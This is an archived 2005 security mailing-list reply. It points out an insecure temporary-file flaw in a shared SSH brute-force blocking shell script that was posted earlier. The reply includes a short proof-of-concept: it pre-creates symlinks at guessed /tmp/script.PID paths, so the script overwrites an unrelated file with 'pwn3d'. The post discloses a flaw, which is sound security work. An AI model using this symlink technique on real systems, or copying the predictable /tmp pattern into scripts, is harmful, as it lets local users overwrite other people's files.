lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <812557103.20050902100357@iron-gate.net>
Date: Fri Sep  2 09:04:13 2005
From: abarrera at iron-gate.net (Alejandro Barrera)
Subject: SSH Bruteforce blocking script

Well, we apreciate your script although I would preffer to stay with my nice
bruteforcing attempts than to create an insecure temporary file bug:

ergosum@...rta:~$ cat test.sh
#!/bin/sh

SCRIPT_NAME=$(basename $0)
TMP_FILE="/tmp/${SCRIPT_NAME}.$$"

touch ${TMP_FILE}
echo "pwn3d" > ${TMP_FILE}
exit
ergosum@...rta:~$ cat data
pr0n g0ld collection: ....

ergosum@...rta:~$ ln -s /home/ergosum/data /tmp/test.sh.18359
ergosum@...rta:~$ ln -s /home/ergosum/data /tmp/test.sh.18361
ergosum@...rta:~$ ln -s /home/ergosum/data /tmp/test.sh.18362
ergosum@...rta:~$ ./test.sh
ergosum@...rta:~$ cat data
pwn3d


> #!/bin/ksh
> #
> # ssh_brute_blocker
> #
> # 05/07/2004 15:05 - Michael L. Benjamin
> #
 
> SCRIPT_NAME=$(basename $0)
> LOG_FILE="/var/log/secure"
> DENY_FILE="/etc/hosts.deny"
> TMP_FILE="/tmp/${SCRIPT_NAME}.$$"
> INBOUND_IP=""
> INLINE=""
> GUESS_COUNT=0
> PERMIT_GUESS=4
 
> touch ${TMP_FILE}
 
> while :
> do
 
> tail -10000 ${LOG_FILE} | grep "Failed password for illegal user" | awk
> -F"from" {'print $2'} | awk {'print $1'} | uniq > ${TMP_FILE}

 
 
 


-- 
Alejandro Barrera Garc?a-Orea
R&D Engineer
c/ Alcala 268 28027 Madrid
Office: +34 91 326 66 11
Fax: +34 91 326 66 11
e-mail: abarrera@...n-gate.net

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ